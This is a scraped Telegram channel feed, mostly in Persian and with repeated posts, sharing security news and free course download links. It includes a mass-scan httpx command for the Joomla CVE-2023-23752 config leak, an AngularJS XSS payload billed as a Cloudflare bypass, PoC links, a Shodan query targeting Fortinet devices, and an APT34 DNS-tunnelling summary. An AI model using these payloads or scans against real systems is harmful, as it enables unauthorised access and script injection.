⭕️CVE-2023-23752
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#joomla #0day
کانال آموزش کامپیوتر
@Engineer_Computer
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
#joomla #0day
کانال آموزش کامپیوتر
@Engineer_Computer
احراز هویت دو مرحلهای توییتر دیگر رایگان نخواهد بود
١. از تاریخ ۲۹ اسفند دسترسی به احراز هویت دو مرحلهای از طریق پیامک تنها در اختیار مشترکین سرویس Blue قرار میگیرد. هزینه استفاده از این طرح در هر ماه برای دستگاههای اندرویدی، ۸ دلار و برای محصولات اپل، ۱۱ دلار خواهد بود.
کانال آموزش کامپیوتر
@Engineer_Computer
١. از تاریخ ۲۹ اسفند دسترسی به احراز هویت دو مرحلهای از طریق پیامک تنها در اختیار مشترکین سرویس Blue قرار میگیرد. هزینه استفاده از این طرح در هر ماه برای دستگاههای اندرویدی، ۸ دلار و برای محصولات اپل، ۱۱ دلار خواهد بود.
کانال آموزش کامپیوتر
@Engineer_Computer
"Network Nightmare" Mindmap.
It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.
• Traffic Hijacking;
• MiTM Attacks;
• Dynamic IGP Routing;
• Configuration Exfiltration;
• DoS;
• NAC/802.1X Bypassing;
• GRE Pivoting;
• Cisco EEM for hiding user;
• Authentication Cracking;
• Information Gathering;
• Cisco Passwords;
• VLAN Bypassing.
https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf
#Mindmap #Red_team
کانال آموزش کامپیوتر
@Engineer_Computer
It is a mindmap for conducting network attacks. For the most part, it will be useful to pentesters or red team operators.
• Traffic Hijacking;
• MiTM Attacks;
• Dynamic IGP Routing;
• Configuration Exfiltration;
• DoS;
• NAC/802.1X Bypassing;
• GRE Pivoting;
• Cisco EEM for hiding user;
• Authentication Cracking;
• Information Gathering;
• Cisco Passwords;
• VLAN Bypassing.
https://github.com/c4s73r/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.pdf
#Mindmap #Red_team
کانال آموزش کامپیوتر
@Engineer_Computer
Cloudflare bypass & template injection to XSS in one shoot
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
#cloudflare #bypass #xss
—————
کانال آموزش کامپیوتر
@Engineer_Computer
CVE-2023-23333 : SolarView Compact 6.00 - Remote Command Execution
POC : https://github.com/Timorlover/CVE-2023-23333
کانال آموزش کامپیوتر
@Engineer_Computer
POC : https://github.com/Timorlover/CVE-2023-23333
کانال آموزش کامپیوتر
@Engineer_Computer
CVE-2022-39952
به زودی شاهد غافل گیری ادمین های شبکه خواهیم بود
امنیت به تجهیزات شما نیست
https://www.shodan.io/search?query=http.favicon.hash%3A945408572+country%3AIR
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-rce-flaws-in-fortinac-and-fortiweb/
کانال آموزش کامپیوتر
@Engineer_Computer
به زودی شاهد غافل گیری ادمین های شبکه خواهیم بود
امنیت به تجهیزات شما نیست
https://www.shodan.io/search?query=http.favicon.hash%3A945408572+country%3AIR
اطلاعات بیشتر:
https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-rce-flaws-in-fortinac-and-fortiweb/
کانال آموزش کامپیوتر
@Engineer_Computer
www.shodan.io
Shodan Search
Search query: http.favicon.hash:945408572 country:IR
نشت جدید: اطلاعات بیش از 800 هزار کاربر #پونیشا هم اکنون در خطر افشای عمومی. این دادهها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، تلفن همراه و اطلاعات دیگری از کاربران را شامل میشود. پونیشا قبلا هم دچار نشت داده شده بود. بیشتر بخوانید: https://wiki.leakfa.com/ponisha-new-leak
کانال آموزش کامپیوتر
Engineer_Computer
کانال آموزش کامپیوتر
Engineer_Computer
CVE-2023-0669 : GoAnywhere MFT < 7.1.2 - pre-authentication command injection
POC : https://github.com/0xf4n9x/CVE-2023-0669
کانال آموزش کامپیوتر
Engineer_Computer
POC : https://github.com/0xf4n9x/CVE-2023-0669
کانال آموزش کامپیوتر
Engineer_Computer
👍2
نشت جدید: دادههای بیش از 800 هزار کاربر "سایت فریلنسری ایرانی و کار آنلاین پونیشا" که بر روی یک Elasticsearch محافظت نشده قرار گرفته بود، هم اکنون در خطر افشای عمومی اطلاعات قرار گرفتهاند. این دادهها نام، نام خانوادگی، جنسیت، شماره ملی، تاریخ تولد، نام کاربری، شماره تلفن همراه، شهر، کشور، نوع حساب، نوع پروفایل، تصویر پروفایل، تصویر روی جلد پروفایل، رزومه، موقعیت شغلی، سوابق تحصیلی، دانشگاه محل تحصیل، مهارت ها و اطلاعات دیگری از کاربران را شامل میشوند. اینسایت دوسال پیش و در حوالی این روزها نیز دچار نشت اطلاعات دیگری شده بود.
کانال آموزش کامپیوتر
Engineer_Computer
کانال آموزش کامپیوتر
Engineer_Computer
دانلود دوره HTML - CSS ( رایگان)
مدرس : میثم منصف
https://cafenode.ir/HTML-CSS/01.zip
https://cafenode.ir/HTML-CSS/02.zip
https://cafenode.ir/HTML-CSS/03.zip
https://cafenode.ir/HTML-CSS/04.zip
https://cafenode.ir/HTML-CSS/05.zip
https://cafenode.ir/HTML-CSS/06.zip
https://cafenode.ir/HTML-CSS/07.zip
https://cafenode.ir/HTML-CSS/08.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/HTML-CSS/01.zip
https://cafenode.ir/HTML-CSS/02.zip
https://cafenode.ir/HTML-CSS/03.zip
https://cafenode.ir/HTML-CSS/04.zip
https://cafenode.ir/HTML-CSS/05.zip
https://cafenode.ir/HTML-CSS/06.zip
https://cafenode.ir/HTML-CSS/07.zip
https://cafenode.ir/HTML-CSS/08.zip
کانال آموزش کامپیوتر
@Engineer_Computer
دانلود رایگان دوره JavaScript - jQuery - Ajax
مدرس : میثم منصف
https://cafenode.ir/JS/01.zip
https://cafenode.ir/JS/02.zip
https://cafenode.ir/JS/03.zip
https://cafenode.ir/JS/04.zip
https://cafenode.ir/JS/05.zip
https://cafenode.ir/JS/06.zip
https://cafenode.ir/JS/07.zip
https://cafenode.ir/JS/08.zip
https://cafenode.ir/JS/09.zip
https://cafenode.ir/JS/10.zip
https://cafenode.ir/JS/11.zip
https://cafenode.ir/JS/12.zip
https://cafenode.ir/JS/13.zip
https://cafenode.ir/JS/14.zip
https://cafenode.ir/JS/15.zip
https://cafenode.ir/JS/16.zip
https://cafenode.ir/JS/17.zip
https://cafenode.ir/JS/18.zip
https://cafenode.ir/JS/19.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/JS/01.zip
https://cafenode.ir/JS/02.zip
https://cafenode.ir/JS/03.zip
https://cafenode.ir/JS/04.zip
https://cafenode.ir/JS/05.zip
https://cafenode.ir/JS/06.zip
https://cafenode.ir/JS/07.zip
https://cafenode.ir/JS/08.zip
https://cafenode.ir/JS/09.zip
https://cafenode.ir/JS/10.zip
https://cafenode.ir/JS/11.zip
https://cafenode.ir/JS/12.zip
https://cafenode.ir/JS/13.zip
https://cafenode.ir/JS/14.zip
https://cafenode.ir/JS/15.zip
https://cafenode.ir/JS/16.zip
https://cafenode.ir/JS/17.zip
https://cafenode.ir/JS/18.zip
https://cafenode.ir/JS/19.zip
کانال آموزش کامپیوتر
@Engineer_Computer
👍1
دانلود دوره رایگان ساخت فروشگاه با PHP - MYSQL ( پارت اول )
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/01.zip
https://cafenode.ir/PHP-SHOP-Project/02.zip
https://cafenode.ir/PHP-SHOP-Project/03.zip
https://cafenode.ir/PHP-SHOP-Project/04.zip
https://cafenode.ir/PHP-SHOP-Project/05.zip
https://cafenode.ir/PHP-SHOP-Project/06.zip
https://cafenode.ir/PHP-SHOP-Project/07.zip
https://cafenode.ir/PHP-SHOP-Project/08.zip
https://cafenode.ir/PHP-SHOP-Project/09.zip
https://cafenode.ir/PHP-SHOP-Project/10.zip
https://cafenode.ir/PHP-SHOP-Project/11.zip
https://cafenode.ir/PHP-SHOP-Project/12.zip
https://cafenode.ir/PHP-SHOP-Project/13.zip
https://cafenode.ir/PHP-SHOP-Project/14.zip
https://cafenode.ir/PHP-SHOP-Project/15.zip
https://cafenode.ir/PHP-SHOP-Project/16.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/01.zip
https://cafenode.ir/PHP-SHOP-Project/02.zip
https://cafenode.ir/PHP-SHOP-Project/03.zip
https://cafenode.ir/PHP-SHOP-Project/04.zip
https://cafenode.ir/PHP-SHOP-Project/05.zip
https://cafenode.ir/PHP-SHOP-Project/06.zip
https://cafenode.ir/PHP-SHOP-Project/07.zip
https://cafenode.ir/PHP-SHOP-Project/08.zip
https://cafenode.ir/PHP-SHOP-Project/09.zip
https://cafenode.ir/PHP-SHOP-Project/10.zip
https://cafenode.ir/PHP-SHOP-Project/11.zip
https://cafenode.ir/PHP-SHOP-Project/12.zip
https://cafenode.ir/PHP-SHOP-Project/13.zip
https://cafenode.ir/PHP-SHOP-Project/14.zip
https://cafenode.ir/PHP-SHOP-Project/15.zip
https://cafenode.ir/PHP-SHOP-Project/16.zip
کانال آموزش کامپیوتر
@Engineer_Computer
👍2
دانلود دوره رایگان ساخت فروشگاه با PHP - MYSQL ( پارت دوم )
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/17.zip
https://cafenode.ir/PHP-SHOP-Project/18.zip
https://cafenode.ir/PHP-SHOP-Project/19.zip
https://cafenode.ir/PHP-SHOP-Project/20.zip
https://cafenode.ir/PHP-SHOP-Project/21.zip
https://cafenode.ir/PHP-SHOP-Project/22.zip
https://cafenode.ir/PHP-SHOP-Project/23.zip
https://cafenode.ir/PHP-SHOP-Project/24.zip
https://cafenode.ir/PHP-SHOP-Project/25.zip
https://cafenode.ir/PHP-SHOP-Project/26.zip
https://cafenode.ir/PHP-SHOP-Project/27.zip
https://cafenode.ir/PHP-SHOP-Project/28.zip
کانال آموزش کامپیوتر
@Engineer_Computer
مدرس : میثم منصف
https://cafenode.ir/PHP-SHOP-Project/17.zip
https://cafenode.ir/PHP-SHOP-Project/18.zip
https://cafenode.ir/PHP-SHOP-Project/19.zip
https://cafenode.ir/PHP-SHOP-Project/20.zip
https://cafenode.ir/PHP-SHOP-Project/21.zip
https://cafenode.ir/PHP-SHOP-Project/22.zip
https://cafenode.ir/PHP-SHOP-Project/23.zip
https://cafenode.ir/PHP-SHOP-Project/24.zip
https://cafenode.ir/PHP-SHOP-Project/25.zip
https://cafenode.ir/PHP-SHOP-Project/26.zip
https://cafenode.ir/PHP-SHOP-Project/27.zip
https://cafenode.ir/PHP-SHOP-Project/28.zip
کانال آموزش کامپیوتر
@Engineer_Computer
دانلود جلسه اول دوره رایگان تست نفوذ وب OWASP
( آموزش HTTP )
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
کانال آموزش کامپیوتر
@Engineer_Computer
( آموزش HTTP )
https://cafenode.ir/OWASP-FREE/01/c01.mp4
https://cafenode.ir/OWASP-FREE/01/c02.mp4
https://cafenode.ir/OWASP-FREE/01/c03.mp4
https://cafenode.ir/OWASP-FREE/01/c04.mp4
کانال آموزش کامپیوتر
@Engineer_Computer
#Saitama #Malware #APT34
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.
زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.
اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.
oxn009lc7n5887k96c4zfckes6uif.rootdomain.com
زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر
70.119.104.111 - 97.109.105.49
اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.
به گزارش Malwrebytes تیم APT34 ایرانی، اقدام به عملیات APT کرده بر روی یک مقام وزارت خارجه اردن رو هدف قرار داد که بواسطه یک ایمیل و فایل XLS که Attach شده در ایمیل، اقدام به ایجاد دسترسی کرده است.
زمانی که قربانی فایل XLS رو باز کرده و گزینه Enable Content رو فعال نماید، یک Macro مخرب فعال شده و فایل مخربی با نام update.exe رو Drop خواهد کرد.
اما نکته جالب توجه این Macro، استفاده از تکنیکی به نام Saitama است ظاهرا ابداع خود تیم APT34 بوده و تکنیکی برای ایجاد DNS Tunneling و ارسال فرمان مبتنی بر DNS بوده که در قسمت FQDN و بر روی زیر دامنه انجام کد گذاری میکند.
oxn009lc7n5887k96c4zfckes6uif.rootdomain.com
زمانی که Backdoor فعال میشود، به FQDN یک درخواست DNS ارسال کرده و مقدار IP رو دریافت میکند، این IPv4 مبتنی بر Octet مفهومی رو برای C2 معنا میکند، برای مثال آدرس زیر
70.119.104.111 - 97.109.105.49
اعداد کد Octet هستند که به کاراکترهای ASCII ترجمه میشوند، برای مثال w=119 ، h=104 ، o=111 و i=105 است که نهایتا کلمه whoami رو از خط فرمان (C2) به Backdoor ارسال میکند.